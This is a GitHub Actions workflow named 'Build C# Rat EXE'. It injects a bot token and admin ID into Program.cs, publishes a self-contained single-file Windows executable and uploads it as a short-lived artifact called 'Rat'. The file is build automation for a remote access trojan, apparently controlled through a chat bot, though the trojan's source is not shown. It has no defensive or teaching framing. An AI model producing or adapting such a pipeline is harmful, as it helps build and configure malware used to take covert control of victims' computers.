name: Build C# Rat EXE

on:
  workflow_dispatch:
    inputs:
      token:
        description: 'Bot Token'
        required: true
        type: string
      admin_id:
        description: 'Admin ID'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest
    
    steps:
      - name: Setup .NET
        uses: actions/setup-dotnet@v4
        with:
          dotnet-version: '8.0.x'  # ← ИЗМЕНИЛ НА 8.0
      
      - name: Checkout code
        uses: actions/checkout@v4
      
      - name: Replace token and admin_id in Program.cs
        run: |
          $content = Get-Content Program.cs -Raw
          $content = $content -replace '{{TOKEN}}', '${{ inputs.token }}'
          $content = $content -replace '{{ADMIN_ID}}', '${{ inputs.admin_id }}'
          Set-Content Program.cs -Value $content
        shell: pwsh
      
      - name: Build EXE
        run: |
          dotnet restore
          dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true -p:IncludeNativeLibrariesForSelfExtract=true -o ./publish
      
      - name: Upload EXE
        uses: actions/upload-artifact@v4
        with:
          name: Rat
          path: publish/*.exe
          retention-days: 1
